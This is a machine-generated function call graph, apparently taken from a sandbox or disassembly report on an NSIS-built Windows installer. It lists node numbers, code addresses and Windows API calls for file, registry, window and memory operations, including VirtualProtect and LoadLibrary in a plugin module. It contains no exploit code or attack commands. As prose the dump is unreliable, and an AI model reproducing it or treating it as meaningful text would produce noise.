4337 4017e4 4393 405b4e GetFileAttributesA 4337->4393 4340 4017ba CompareFileTime 4340->4361 4341 40187e 4343 405101 24 API calls 4341->4343 4342 401855 4344 405101 24 API calls 4342->4344 4352 40186a 4342->4352 4346 401888 4343->4346 4344->4352 4345 405fda lstrcpynA 4345->4361 4364 402ffb 4346->4364 4349 4018af SetFileTime 4351 4018c1 CloseHandle 4349->4351 4350 405ffc 17 API calls 4350->4361 4351->4352 4353 4018d2 4351->4353 4354 4018d7 4353->4354 4355 4018ea 4353->4355 4357 405ffc 17 API calls 4354->4357 4356 405ffc 17 API calls 4355->4356 4359 4018f2 4356->4359 4358 4018df lstrcatA 4357->4358 4358->4359 4359->4352 4362 4056f6 MessageBoxIndirectA 4359->4362 4361->4337 4361->4340 4361->4341 4361->4342 4361->4345 4361->4350 4363 405b73 GetFileAttributesA CreateFileA 4361->4363 4390 4062dd FindFirstFileA 4361->4390 4396 4056f6 4361->4396 4362->4352 4363->4361 4366 403011 4364->4366 4365 40303c 4400 4031d7 4365->4400 4366->4365 4412 4031ed SetFilePointer 4366->4412 4370 403177 4372 40317b 4370->4372 4377 403193 4370->4377 4371 403059 GetTickCount 4381 40306c 4371->4381 4374 4031d7 ReadFile 4372->4374 4373 40189b 4373->4349 4373->4351 4374->4373 4375 4031d7 ReadFile 4375->4377 4376 4031d7 ReadFile 4376->4381 4377->4373 4377->4375 4378 405c1a WriteFile 4377->4378 4378->4377 4380 4030d2 GetTickCount 4380->4381 4381->4373 4381->4376 4381->4380 4382 4030fb MulDiv wsprintfA 4381->4382 4403 4064b7 4381->4403 4410 405c1a WriteFile 4381->4410 4383 405101 24 API calls 4382->4383 4383->4381 4385->4331 4386->4332 4388 401797 lstrcatA 4387->4388 4389 40598c lstrcatA 4387->4389 4388->4331 4389->4388 4391 4062f3 FindClose 4390->4391 4392 4062fe 4390->4392 4391->4392 4392->4361 4394 405b60 SetFileAttributesA 4393->4394 4395 405b6d 4393->4395 4394->4395 4395->4361 4397 40570b 4396->4397 4398 405757 4397->4398 4399 40571f MessageBoxIndirectA 4397->4399 4398->4361 4399->4398 4413 405beb ReadFile 4400->4413 4404 4064dc 4403->4404 4405 4064e4 4403->4405 4404->4381 4405->4404 4406 406574 GlobalAlloc 4405->4406 4407 40656b GlobalFree 4405->4407 4408 4065e2 GlobalFree 4405->4408 4409 4065eb GlobalAlloc 4405->4409 4406->4404 4406->4405 4407->4406 4408->4409 4409->4404 4409->4405 4411 405c38 4410->4411 4411->4381 4412->4365 4414 403047 4413->4414 4414->4370 4414->4371 4414->4373 5313 401659 5314 402b2c 17 API calls 5313->5314 5315 40165f 5314->5315 5316 4062dd 2 API calls 5315->5316 5317 401665 5316->5317 5318 401959 5319 402b0a 17 API calls 5318->5319 5320 401960 5319->5320 5321 402b0a 17 API calls 5320->5321 5322 40196d 5321->5322 5323 402b2c 17 API calls 5322->5323 5324 401984 lstrlenA 5323->5324 5326 401994 5324->5326 5325 4019d4 5326->5325 5330 405fda lstrcpynA 5326->5330 5328 4019c4 5328->5325 5329 4019c9 lstrlenA 5328->5329 5329->5325 5330->5328 4415 4024da 4416 402b6c 17 API calls 4415->4416 4417 4024e4 4416->4417 4418 402b2c 17 API calls 4417->4418 4419 4024ed 4418->4419 4420 4024f7 RegQueryValueExA 4419->4420 4423 402783 4419->4423 4421 40251d RegCloseKey 4420->4421 4422 402517 4420->4422 4421->4423 4422->4421 4426 405f38 wsprintfA 4422->4426 4426->4421 5338 401cda 5339 402b0a 17 API calls 5338->5339 5340 401ce0 IsWindow 5339->5340 5341 401a0e 5340->5341 5342 402cdd 5343 402d05 5342->5343 5344 402cec SetTimer 5342->5344 5345 402d5a 5343->5345 5346 402d1f MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5343->5346 5344->5343 5346->5345 5347 401a5e 5348 402b0a 17 API calls 5347->5348 5349 401a67 5348->5349 5350 402b0a 17 API calls 5349->5350 5351 401a0e 5350->5351 4437 72be2921 4438 72be2971 4437->4438 4439 72be2931 VirtualProtect 4437->4439 4439->4438 4440 401b63 4441 401b70 4440->4441 4442 401bb4 4440->4442 4443 40233b 4441->4443 4449 401b87 4441->4449 4444 401bdd GlobalAlloc 4442->4444 4446 401bb8 4442->4446 4445 405ffc 17 API calls 4443->4445 4447 405ffc 17 API calls 4444->4447 4448 402348 4445->4448 4454 401bf8 4446->4454 4461 405fda lstrcpynA 4446->4461 4447->4454 4448->4454 4455 4056f6 MessageBoxIndirectA 4448->4455 4459 405fda lstrcpynA 4449->4459 4452 401bca GlobalFree 4452->4454 4453 401b96 4460 405fda lstrcpynA 4453->4460 4455->4454 4457 401ba5 4462 405fda lstrcpynA 4457->4462 4459->4453 4460->4457 4461->4452 4462->4454 4463 402363 4464 402371 4463->4464 4465 40236b 4463->4465 4467 402381 4464->4467 4468 402b2c 17 API calls 4464->4468 4466 402b2c 17 API calls 4465->4466 4466->4464 4469 402b2c 17 API calls 4467->4469 4472 40238f 4467->4472 4468->4467 4469->4472 4470 402b2c 17 API calls 4471 402398 WritePrivateProfileStringA 4470->4471 4472->4470 5352 401563 5353 402960 5352->5353 5356 405f38 wsprintfA 5353->5356 5355 402965 5356->5355 5357 402765 5358 402b2c 17 API calls 5357->5358 5359 40276c FindFirstFileA 5358->5359 5360 40278f 5359->5360 5363 40277f 5359->5363 5365 405f38 wsprintfA 5360->5365 5362 402796 5366 405fda lstrcpynA 5362->5366 5365->5362 5366->5363 5367 406666 5373 4064ea 5367->5373 5368 406e55 5369 406574 GlobalAlloc 5369->5368 5369->5373 5370 40656b GlobalFree 5370->5369 5371 4065e2 GlobalFree 5372 4065eb GlobalAlloc 5371->5372 5372->5368 5372->5373 5373->5368 5373->5369 5373->5370 5373->5371 5373->5372 5374 4063e7 WaitForSingleObject 5375 406401 5374->5375 5376 406413 GetExitCodeProcess 5375->5376 5377 4063ae 2 API calls 5375->5377 5378 406408 WaitForSingleObject 5377->5378 5378->5375 4480 4023e8 4481 40241a 4480->4481 4482 4023ef 4480->4482 4484 402b2c 17 API calls 4481->4484 4483 402b6c 17 API calls 4482->4483 4485 4023f6 4483->4485 4486 402421 4484->4486 4487 402400 4485->4487 4491 40242e 4485->4491 4492 402bea 4486->4492 4489 402b2c 17 API calls 4487->4489 4490 402407 RegDeleteValueA RegCloseKey 4489->4490 4490->4491 4493 402bf6 4492->4493 4494 402bfd 4492->4494 4493->4491 4494->4493 4496 402c2e 4494->4496 4497 405e60 RegOpenKeyExA 4496->4497 4501 402c5c 4497->4501 4498 402c82 RegEnumKeyA 4499 402c99 RegCloseKey 4498->4499 4498->4501 4507 406372 GetModuleHandleA 4499->4507 4500 402cba RegCloseKey 4506 402cad 4500->4506 4501->4498 4501->4499 4501->4500 4503 402c2e 6 API calls 4501->4503 4501->4506 4503->4501 4505 402cca RegDeleteKeyA 4505->4506 4506->4493 4508 406398 GetProcAddress 4507->4508 4509 40638e 4507->4509 4511 402ca9 4508->4511 4513 406304 GetSystemDirectoryA 4509->4513 4511->4505 4511->4506 4512 406394 4512->4508 4512->4511 4514 406326 wsprintfA LoadLibraryExA 4513->4514 4514->4512 4516 40206a 4517 40212a 4516->4517 4518 40207c 4516->4518 4520 401423 24 API calls 4517->4520 4519 402b2c 17 API calls 4518->4519 4521 402083 4519->4521 4526 4022a9 4520->4526 4522 402b2c 17 API calls 4521->4522 4523 40208c 4522->4523 4524 4020a1 LoadLibraryExA 4523->4524 4525 402094 GetModuleHandleA 4523->4525 4524->4517 4527 4020b1 GetProcAddress 4524->4527 4525->4524 4525->4527 4528 4020c0 4527->4528 4529 4020fd 4527->4529 4531 4020c8 4528->4531 4532 4020df 4528->4532 4530 405101 24 API calls 4529->4530 4534 4020d0 4530->4534 4579 401423 4531->4579 4537 72be16db 4532->4537 4534->4526 4535 40211e FreeLibrary 4534->4535 4535->4526 4538 72be170b 4537->4538 4582 72be1a98 4538->4582 4540 72be1712 4541 72be1834 4540->4541 4542 72be172a 4540->4542 4543 72be1723 4540->4543 4541->4534 4616 72be22f1 4542->4616 4632 72be22af 4543->4632 4548 72be178e 4554 72be17dc 4548->4554 4555 72be1794 4548->4555 4549 72be1770 4645 72be24d8 4549->4645 4550 72be1759 4563 72be174f 4550->4563 4642 72be2cc3 4550->4642 4551 72be1740 4553 72be1746 4551->4553 4559 72be1751 4551->4559 4553->4563 4626 72be2a38 4553->4626 4557 72be24d8 11 API calls 4554->4557 4664 72be156b 4555->4664 4564 72be17cd 4557->4564 4558 72be1776 4656 72be1559 4558->4656 4636 72be26b2 4559->4636 4563->4548 4563->4549 4570 72be1823 4564->4570 4670 72be249e 4564->4670 4567 72be24d8 11 API calls 4567->4564 4569 72be1757 4569->4563 4570->4541 4572 72be182d GlobalFree 4570->4572 4572->4541 4576 72be180f 4576->4570 4674 72be14e2 wsprintfA 4576->4674 4577 72be1808 FreeLibrary 4577->4576 4580 405101 24 API calls 4579->4580 4581 401431 4580->4581 4581->4534 4677 72be1215 GlobalAlloc 4582->4677 4584 72be1abf 4678 72be1215 GlobalAlloc 4584->4678 4586 72be1d00 GlobalFree GlobalFree GlobalFree 4587 72be1d1d 4586->4587 4602 72be1d67 4586->4602 4590 72be20f1 4587->4590 4599 72be1d32 4587->4599 4587->4602 4588 72be1aca 4588->4586 4589 72be1bbd GlobalAlloc 4588->4589 4591 72be2033 4588->4591 4593 72be1c08 lstrcpyA 4588->4593 4594 72be1c26 GlobalFree 4588->4594 4598 72be1c12 lstrcpyA 4588->4598 4601 72be1fb7 4588->4601 4588->4602 4608 72be1ef9 GlobalFree 4588->4608 4609 72be1224 2 API calls 4588->4609 4610 72be1c64 4588->4610 4589->4588 4592 72be2113 GetModuleHandleA 4590->4592 4590->4602 4591->4602 4613 72be208c lstrcpyA 4591->4613 4595 72be2139 4592->4595 4596 72be2124 LoadLibraryA 4592->4596 4593->4598 4594->4588 4685 72be15c2 GetProcAddress 4595->4685 4596->4595 4596->4602 4598->4588 4599->4602 4681 72be1224 4599->4681 4600 72be214b 4605 72be218a 4600->4605 4614 72be2174 GetProcAddress 4600->4614 4684 72be1215 GlobalAlloc 4601->4684 4602->4540 4605->4602 4606 72be2197 lstrlenA 4605->4606 4686 72be15c2 GetProcAddress 4606->4686 4608->4588 4609->4588 4610->4588 4679 72be1534 GlobalSize GlobalAlloc 4610->4679 4611 72be21b0 4611->4602 4613->4602 4614->4605 4615 72be1fbf 4615->4540 4624 72be230a 4616->4624 4618 72be2446 GlobalFree 4620 72be1730 4618->4620 4618->4624 4619 72be23b8 GlobalAlloc MultiByteToWideChar 4621 72be23e4 GlobalAlloc CLSIDFromString GlobalFree 4619->4621 4622 72be2405 4619->4622 4620->4550 4620->4551 4620->4563 4621->4618 4622->4618 4692 72be2646 4622->4692 4623 72be1224 GlobalAlloc lstrcpynA 4623->4624 4624->4618 4624->4619 4624->4622 4624->4623 4688 72be12ad 4624->4688 4628 72be2a4a 4626->4628 4627 72be2aef SetFilePointer 4631 72be2b0d 4627->4631 4628->4627 4630 72be2bd9 4630->4563 4695 72be29e4 4631->4695 4633 72be22c4 4632->4633 4634 72be22cf GlobalAlloc 4633->4634 4635 72be1729 4633->4635 4634->4633 4635->4542 4640 72be26e2 4636->4640 4637 72be277d GlobalAlloc 4641 72be27a0 4637->4641 4638 72be2790 4639 72be2796 GlobalSize 4638->4639 4638->4641 4639->4641 4640->4637 4640->4638 4641->4569 4643 72be2cce 4642->4643 4644 72be2d0e GlobalFree 4643->4644 4699 72be1215 GlobalAlloc 4645->4699 4647 72be2598 WideCharToMultiByte 4653 72be24e4 4647->4653 4648 72be2574 StringFromGUID2 WideCharToMultiByte 4648->4653 4649 72be2563 lstrcpynA 4649->4653 4650 72be25b9 wsprintfA 4650->4653 4651 72be25dd GlobalFree 4651->4653 4652 72be2617 GlobalFree 4652->4558 4653->4647 4653->4648 4653->4649 4653->4650 4653->4651 4653->4652 4654 72be1266 2 API calls 4653->4654 4700 72be12d1 4653->4700 4654->4653 4704 72be1215 GlobalAlloc 4656->4704 4658 72be155e 4659 72be156b 2 API calls 4658->4659 4660 72be1568 4659->4660 4661 72be1266 4660->4661 4662 72be126f GlobalAlloc lstrcpynA 4661->4662 4663 72be12a8 GlobalFree 4661->4663 4662->4663 4663->4564 4665 72be1577 wsprintfA 4664->4665 4666 72be15a4 lstrcpyA 4664->4666 4669 72be15bd 4665->4669 4666->4669 4669->4567 4671 72be24ac 4670->4671 4672 72be17ef 4670->4672 4671->4672 4673 72be24c5 GlobalFree 4671->4673 4672->4576 4672->4577 4673->4671 4675 72be1266 2 API calls 4674->4675 4676 72be1503 4675->4676 4676->4570 4677->4584 4678->4588 4680 72be1552 4679->4680 4680->4610 4687 72be1215 GlobalAlloc 4681->4687 4683 72be1233 lstrcpynA 4683->4602 4684->4615 4685->4600 4686->4611 4687->4683 4689 72be12b4 4688->4689 4690 72be1224 2 API calls 4689->4690 4691 72be12cf 4690->4691 4691->4624 4693 72be26aa 4692->4693 4694 72be2654 VirtualAlloc 4692->4694 4693->4622 4694->4693 4696 72be29ef 4695->4696 4697 72be29ff 4696->4697 4698 72be29f4 GetLastError 4696->4698 4697->4630 4698->4697 4699->4653 4701 72be12da 4700->4701 4702 72be12f9 4700->4702 4701->4702 4703 72be12e0 lstrcpyA 4701->4703 4702->4653 4703->4702 4704->4658 5379 40166a 5380 402b2c 17 API calls 5379->5380 5381 401671 5380->5381 5382 402b2c 17 API calls 5381->5382 5383 40167a 5382->5383 5384 402b2c 17 API calls 5383->5384 5385 401683 MoveFileA 5384->5385 5386 401696 5385->5386 5387 40168f 5385->5387 5388 4062dd 2 API calls 5386->5388 5391 4022a9 5386->5391 5389 401423 24 API calls 5387->5389 5390 4016a5 5388->5390 5389->5391 5390->5391 5392 405db9 36 API calls 5390->5392 5392->5387 5393 4025ea 5394 402603 5393->5394 5395 4025ef 5393->5395 5396 402b2c 17 API calls 5394->5396 5397 402b0a 17 API calls 5395->5397 5398 40260a lstrlenA 5396->5398 5399 4025f8 5397->5399 5398->5399 5400 40262c 5399->5400 5401 405c1a WriteFile 5399->5401 5401->5400 5402 404a6d GetDlgItem GetDlgItem 5403 404ac3 7 API calls 5402->5403 5411 404cea 5402->5411 5404 404b6b DeleteObject 5403->5404 5405 404b5f SendMessageA 5403->5405 5406 404b76 5404->5406 5405->5404 5407 404bad 5406->5407 5412 405ffc 17 API calls 5406->5412 5409 404068 18 API calls 5407->5409 5408 404dcc 5410 404e78 5408->5410 5415 404cdd 5408->5415 5420 404e25 SendMessageA 5408->5420 5414 404bc1 5409->5414 5416 404e82 SendMessageA 5410->5416 5417 404e8a 5410->5417 5411->5408 5436 404d59 5411->5436 5455 4049bb SendMessageA 5411->5455 5413 404b8f SendMessageA SendMessageA 5412->5413 5413->5406 5419 404068 18 API calls 5414->5419 5421 4040cf 8 API calls 5415->5421 5416->5417 5423 404ea3 5417->5423 5424 404e9c ImageList_Destroy 5417->5424 5432 404eb3 5417->5432 5437 404bd2 5419->5437 5420->5415 5426 404e3a SendMessageA 5420->5426 5427 40506e 5421->5427 5422 404dbe SendMessageA 5422->5408 5428 404eac GlobalFree 5423->5428 5423->5432 5424->5423 5425 405022 5425->5415 5433 405034 ShowWindow GetDlgItem ShowWindow 5425->5433 5430 404e4d 5426->5430 5428->5432 5429 404cac GetWindowLongA SetWindowLongA 5431 404cc5 5429->5431 5441 404e5e SendMessageA 5430->5441 5434 404ce2 5431->5434 5435 404cca ShowWindow 5431->5435 5432->5425 5449 404eee 5432->5449 5460 404a3b 5432->5460 5433->5415 5454 40409d SendMessageA 5434->5454 5453 40409d SendMessageA 5435->5453 5436->5408 5436->5422 5437->5429 5440 404c24 SendMessageA 5437->5440 5442 404ca7 5437->5442 5443 404c62 SendMessageA 5437->5443 5444 404c76 SendMessageA 5437->5444 5440->5437 5441->5410 5442->5429 5442->5431 5443->5437 5444->5437 5446 404ff8 InvalidateRect 5446->5425 5447 40500e 5446->5447 5469 404976 5447->5469 5448 404f1c SendMessageA 5452 404f32 5448->5452 5449->5448 5449->5452 5451 404fa6 SendMessageA SendMessageA 5451->5452 5452->5446 5452->5451 5453->5415 5454->5411 5456 404a1a SendMessageA 5455->5456 5457 4049de GetMessagePos ScreenToClient SendMessageA 5455->5457 5458 404a12 5456->5458 5457->5458 5459 404a17 5457->5459 5458->5436 5459->5456 5472 405fda lstrcpynA 5460->5472 5462 404a4e 5473 405f38 wsprintfA 5462->5473 5464 404a58 5465 40140b 2 API calls 5464->5465 5466 404a61 5465->5466 5474 405fda lstrcpynA 5466->5474 5468 404a68 5468->5449 5475 4048b1 5469->5475 5471 40498b 5471->5425 5472->5462 5473->5464 5474->5468 5476 4048c7 5475->5476 5477 405ffc 17 API calls 5476->5477 5478 40492b 5477->5478 5479 405ffc 17 API calls 5478->5479 5480 404936 5479->5480 5481 405ffc 17 API calls 5480->5481 5482 40494c lstrlenA wsprintfA SetDlgItemTextA 5481->5482 5482->5471 5483 4019ed 5484 402b2c 17 API calls 5483->5484 5485 4019f4 5484->5485 5486 402b2c 17 API calls 5485->5486 5487 4019fd 5486->5487 5488 401a04 lstrcmpiA 5487->5488 5489 401a16 lstrcmpA 5487->5489 5490 401a0a 5488->5490 5489->5490 4705 4026ef 4706 4026f6 4705->4706 4707 402965 4705->4707 4708 402b0a 17 API calls 4706->4708 4709 4026fd 4708->4709 4710 40270c SetFilePointer 4709->4710 4710->4707 4711 40271c 4710->4711 4713 405f38 wsprintfA 4711->4713 4713->4707 5491 40156f 5492 401586 5491->5492 5493 40157f ShowWindow 5491->5493 5494 401594 ShowWindow 5492->5494 5495 4029b8 5492->5495 5493->5492 5494->5495 5503 4014f4 SetForegroundWindow 5504 4029b8 5503->5504 5505 405075 5506 405085 5505->5506 5507 405099 5505->5507 5508 40508b 5506->5508 5517 4050e2 5506->5517 5509 4050a1 IsWindowVisible 5507->5509 5513 4050b8 5507->5513 5511 4040b4 SendMessageA 5508->5511 5512 4050ae 5509->5512 5509->5517 5510 4050e7 CallWindowProcA 5514 405095 5510->5514 5511->5514 5515 4049bb 5 API calls 5512->5515 5513->5510 5516 404a3b 4 API calls 5513->5516 5515->5513 5516->5517 5517->5510 5518 4044fa 5519 404526 5518->5519 5520 404537 5518->5520 5579 4056da GetDlgItemTextA 5519->5579 5522 404543 GetDlgItem 5520->5522 5525 4045a2 5520->5525 5524 404557 5522->5524 5523 404531 5527 406244 5 API calls 5523->5527 5528 40456b SetWindowTextA 5524->5528 5531 405a0b 4 API calls 5524->5531 5526 404686 5525->5526 5533 405ffc 17 API calls 5525->5533 5577 404830 5525->5577 5526->5577 5581 4056da GetDlgItemTextA 5526->5581 5527->5520 5532 404068 18 API calls 5528->5532 5530 4040cf 8 API calls 5535 404844 5530->5535 5536 404561 5531->5536 5537 404587 5532->5537 5538 404616 SHBrowseForFolderA 5533->5538 5534 4046b6 5539 405a60 18 API calls 5534->5539 5536->5528 5545 405972 3 API calls 5536->5545 5540 404068 18 API calls 5537->5540 5538->5526 5541 40462e CoTaskMemFree 5538->5541 5544 4046bc 5539->5544 5542 404595 5540->5542 5543 405972 3 API calls 5541->5543 5580 40409d SendMessageA 5542->5580 5547 40463b 5543->5547 5582 405fda lstrcpynA 5544->5582 5545->5528 5550 404672 SetDlgItemTextA 5547->5550 5554 405ffc 17 API calls 5547->5554 5549 40459b 5552 406372 5 API calls 5549->5552 5550->5526 5551 4046d3 5553 406372 5 API calls 5551->5553 5552->5525 5561 4046da 5553->5561 5555 40465a lstrcmpiA 5554->5555 5555->5550 5558 40466b lstrcatA 5555->5558 5556 404716 5583 405fda lstrcpynA 5556->5583 5558->5550 5559 40471d 5560 405a0b 4 API calls 5559->5560 5562 404723 GetDiskFreeSpaceA 5560->5562 5561->5556 5565 4059b9 2 API calls 5561->5565 5567 40476e 5561->5567 5564 404747 MulDiv 5562->5564 5562->5567 5564->5567 5565->5561 5566 4047df 5569 404802 5566->5569 5571 40140b 2 API calls 5566->5571 5567->5566 5568 404976 20 API calls 5567->5568 5570 4047cc 5568->5570 5584 40408a KiUserCallbackDispatcher 5569->5584 5573 4047e1 SetDlgItemTextA 5570->5573 5574 4047d1 5570->5574 5571->5569 5573->5566 5576 4048b1 20 API calls 5574->5576 5575 40481e 5575->5577 5578 404453 SendMessageA 5575->5578 5576->5566 5577->5530 5578->5577 5579->5523 5580->5549 5581->5534 5582->5551 5583->5559 5584->5575 5585 401cfb 5586 402b0a 17 API calls 5585->5586 5587 401d02 5586->5587 5588 402b0a 17 API calls 5587->5588 5589 401d0e GetDlgItem 5588->5589 5590 4025e4 5589->5590 5591 4018fd 5592 401934 5591->5592 5593 402b2c 17 API calls 5592->5593 5594 401939 5593->5594 5595 4057a2 67 API calls 5594->5595 5596 401942 5595->5596 5597 72be1000 5598 72be101b 5 API calls 5597->5598 5599 72be1019 5598->5599 5600 401dff GetDC 5601 402b0a 17 API calls 5600->5601 5602 401e11 GetDeviceCaps MulDiv ReleaseDC 5601->5602 5603 402b0a 17 API calls 5602->5603 5604 401e42 5603->5604 5605 405ffc 17 API calls 5604->5605 5606 401e7f CreateFontIndirectA 5605->5606 5607 4025e4 5606->5607 5607->5607 5608 401000 5609 401037 BeginPaint GetClientRect 5608->5609 5610 40100c DefWindowProcA 5608->5610 5612 4010f3 5609->5612 5615 401179 5610->5615 5613 401073 CreateBrushIndirect FillRect DeleteObject 5612->5613 5614 4010fc 5612->5614 5613->5612 5616 401102 CreateFontIndirectA 5614->5616 5617 401167 EndPaint 5614->5617 5616->5617 5618 401112 6 API calls 5616->5618 5617->5615 5618->5617 5619 401900 5620 402b2c 17 API calls 5619->5620 5621 401907 5620->5621 5622 4056f6 MessageBoxIndirectA 5621->5622 5623 401910 5622->5623 5624 401502 5625 40150a 5624->5625 5627 40151d 5624->5627 5626 402b0a 17 API calls 5625->5626 5626->5627 4112 401c0a 4134 402b0a 4112->4134 4114 401c11 4115 402b0a 17 API calls 4114->4115 4116 401c1e 4115->4116 4117 402b2c 17 API calls 4116->4117 4118 401c33 4116->4118 4117->4118 4119 402b2c 17 API calls 4118->4119 4123 401c43 4118->4123 4119->4123 4120 401c9a 4122 402b2c 17 API calls 4120->4122 4121 401c4e 4124 402b0a 17 API calls 4121->4124 4125 401c9f 4122->4125 4123->4120 4123->4121 4126 401c53 4124->4126 4127 402b2c 17 API calls 4125->4127 4128 402b0a 17 API calls 4126->4128 4129 401ca8 FindWindowExA 4127->4129 4130 401c5f 4128->4130 4133 401cc6 4129->4133 4131 401c8a SendMessageA 4130->4131 4132 401c6c SendMessageTimeoutA 4130->4132 4131->4133 4132->4133 4135 405ffc 17 API calls 4134->4135 4136 402b1f 4135->4136 4136->4114 4167 401e8f 4168 402b0a 17 API calls 4167->4168 4169 401e95 4168->4169 4170 402b0a 17 API calls 4169->4170 4171 401ea1 4170->4171 4172 401eb8 EnableWindow 4171->4172 4173 401ead ShowWindow 4171->4173 4174 4029b8 4172->4174 4173->4174 5635 401490 5636 405101 24 API calls 5635->5636 5637 401497 5636->5637 5638 402993 SendMessageA 5639 4029b8 5638->5639 5640 4029ad InvalidateRect 5638->5640 5640->5639 4234 403b94 4235 403ce7 4234->4235 4236 403bac 4234->4236 4238 403d38 4235->4238 4239 403cf8 GetDlgItem GetDlgItem 4235->4239 4236->4235 4237 403bb8 4236->4237 4240 403bc3 SetWindowPos 4237->4240 4241 403bd6 4237->4241 4243 403d92 4238->4243 4248 401389 2 API calls 4238->4248 4242 404068 18 API calls 4239->4242 4240->4241 4245 403bf3 4241->4245 4246 403bdb ShowWindow 4241->4246 4247 403d22 SetClassLongA 4242->4247 4265 403ce2 4243->4265 4305 4040b4 4243->4305 4249 403c15 4245->4249 4250 403bfb DestroyWindow 4245->4250 4246->4245 4251 40140b 2 API calls 4247->4251 4252 403d6a 4248->4252 4253 403c1a SetWindowLongA 4249->4253 4254 403c2b 4249->4254 4304 403ff1 4250->4304 4251->4238 4252->4243 4255 403d6e SendMessageA 4252->4255 4253->4265 4258 403cd4 4254->4258 4259 403c37 GetDlgItem 4254->4259 4255->4265 4256 40140b 2 API calls 4275 403da4 4256->4275 4257 403ff3 DestroyWindow EndDialog 4257->4304 4262 4040cf 8 API calls 4258->4262 4260 403c67 4259->4260 4261 403c4a SendMessageA IsWindowEnabled 4259->4261 4264 403c6c 4260->4264 4267 403c74 4260->4267 4268 403cbb SendMessageA 4260->4268 4269 403c87 4260->4269 4261->4260 4261->4265 4262->4265 4263 404022 ShowWindow 4263->4265 4321 404041 4264->4321 4266 405ffc 17 API calls 4266->4275 4267->4264 4267->4268 4268->4258 4272 403ca4 4269->4272 4273 403c8f 4269->4273 4271 404068 18 API calls 4271->4275 4276 40140b 2 API calls 4272->4276 4318 40140b 4273->4318 4274 403ca2 4274->4258 4275->4256 4275->4257 4275->4265 4275->4266 4275->4271 4279 404068 18 API calls 4275->4279 4295 403f33 DestroyWindow 4275->4295 4278 403cab 4276->4278 4278->4258 4278->4264 4280 403e1f GetDlgItem 4279->4280 4281 403e34 4280->4281 4282 403e3c ShowWindow KiUserCallbackDispatcher 4280->4282 4281->4282 4308 40408a KiUserCallbackDispatcher 4282->4308 4284 403e66 EnableWindow 4289 403e7a 4284->4289 4285 403e7f GetSystemMenu EnableMenuItem SendMessageA 4286 403eaf SendMessageA 4285->4286 4285->4289 4286->4289 4289->4285 4309 40409d SendMessageA 4289->4309 4310 403b75 4289->4310 4313 405fda lstrcpynA 4289->4313 4291 403ede lstrlenA 4292 405ffc 17 API calls 4291->4292 4293 403eef SetWindowTextA 4292->4293 4314 401389 4293->4314 4296 403f4d CreateDialogParamA 4295->4296 4295->4304 4297 403f80 4296->4297 4296->4304 4298 404068 18 API calls 4297->4298 4299 403f8b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4298->4299 4300 401389 2 API calls 4299->4300 4301 403fd1 4300->4301 4301->4265 4302 403fd9 ShowWindow 4301->4302 4303 4040b4 SendMessageA 4302->4303 4303->4304 4304->4263 4304->4265 4306 4040cc 4305->4306 4307 4040bd SendMessageA 4305->4307 4306->4275 4307->4306 4308->4284 4309->4289 4311 405ffc 17 API calls 4310->4311 4312 403b83 SetWindowTextA 4311->4312 4312->4289 4313->4291 4316 401390 4314->4316 4315 4013fe 4315->4275 4316->4315 4317 4013cb MulDiv SendMessageA 4316->4317 4317->4316 4319 401389 2 API calls 4318->4319 4320 401420 4319->4320 4320->4264 4322 404048 4321->4322 4323 40404e SendMessageA 4321->4323 4322->4323 4323->4274 5641 401f98 5642 402b2c 17 API calls 5641->5642 5643 401f9f 5642->5643 5644 4062dd 2 API calls 5643->5644 5645 401fa5 5644->5645 5647 401fb7 5645->5647 5648 405f38 wsprintfA 5645->5648 5648->5647 4427 40159d 4428 402b2c 17 API calls 4427->4428 4429 4015a4 SetFileAttributesA 4428->4429 4430 4015b6 4429->4430 5663 72be2be3 5664 72be2bfb 5663->5664 5665 72be1534 2 API calls 5664->5665 5666 72be2c16 5665->5666 5667 40149d 5668 4014ab PostQuitMessage 5667->5668 5669 40234e 5667->5669 5668->5669 4431 401a1e 4432 402b2c 17 API calls 4431->4432 4433 401a27 ExpandEnvironmentStringsA 4432->4433 4434 401a3b 4433->4434 4436 401a4e 4433->4436 4435 401a40 lstrcmpA 4434->4435 4434->4436 4435->4436 5670 72be10e0 5679 72be110e 5670->5679 5671 72be11c4 GlobalFree 5672 72be12ad 2 API calls 5672->5679 5673 72be11c3 5673->5671 5674 72be11ea GlobalFree 5674->5679 5675 72be1266 2 API calls 5678 72be11b1 GlobalFree 5675->5678 5676 72be1155 GlobalAlloc 5676->5679 5677 72be12d1 lstrcpyA 5677->5679 5678->5679 5679->5671 5679->5672 5679->5673 5679->5674 5679->5675 5679->5676 5679->5677 5679->5678 5685 40289e 5686 402b0a 17 API calls 5685->5686 5687 4028a4 5686->5687 5688 4028e3 5687->5688 5689 4028cc 5687->5689 5692 402783 5687->5692 5690 4028fd 5688->5690 5691 4028ed 5688->5691 5693 4028d1 5689->5693 5698 4028e0 5689->5698 5695 405ffc 17 API calls 5690->5695 5694 402b0a 17 API calls 5691->5694 5699 405fda lstrcpynA 5693->5699 5694->5698 5695->5698 5698->5692 5700 405f38 wsprintfA 5698->5700 5699->5692 5700->5692 5701 40419e lstrcpynA lstrlenA 5702 40171f 5703 402b2c 17 API calls 5702->5703 5704 401726 SearchPathA 5703->5704 5705 401741 5704->5705 5706 401d20 5707 402b0a 17 API calls 5706->5707 5708 401d2e SetWindowLongA 5707->5708 5709 4029b8 5708->5709 5710 402721 5711 402727 5710->5711 5712 4029b8 5711->5712 5713 40272f FindClose 5711->5713 5713->5712 5721 4027a3 5722 402b2c 17 API calls 5721->5722 5723 4027b1 5722->5723 5724 4027c7 5723->5724 5725 402b2c 17 API calls 5723->5725 5726 405b4e 2 API calls 5724->5726 5725->5724 5727 4027cd 5726->5727 5749 405b73 GetFileAttributesA CreateFileA 5727->5749 5729 4027da 5730 4027e6 GlobalAlloc 5729->5730 5731 40287d 5729->5731 5732 402874 CloseHandle 5730->5732 5733 4027ff 5730->5733 5734 402885 DeleteFileA 5731->5734 5735 402898 5731->5735 5732->5731 5750 4031ed SetFilePointer 5733->5750 5734->5735 5737 402805 5738 4031d7 ReadFile 5737->5738 5739 40280e GlobalAlloc 5738->5739 5740 402852 5739->5740 5741 40281e 5739->5741 5743 405c1a WriteFile 5740->5743 5742 402ffb 35 API calls 5741->5742 5744 40282b 5742->5744 5745 40285e GlobalFree 5743->5745 5747 402849 GlobalFree 5744->5747 5746 402ffb 35 API calls 5745->5746 5748 402871 5746->5748 5747->5740 5748->5732 5749->5729 5750->5737 5751 72be225a 5752 72be22c4 5751->5752 5753 72be22cf GlobalAlloc 5752->5753 5754 72be22ee 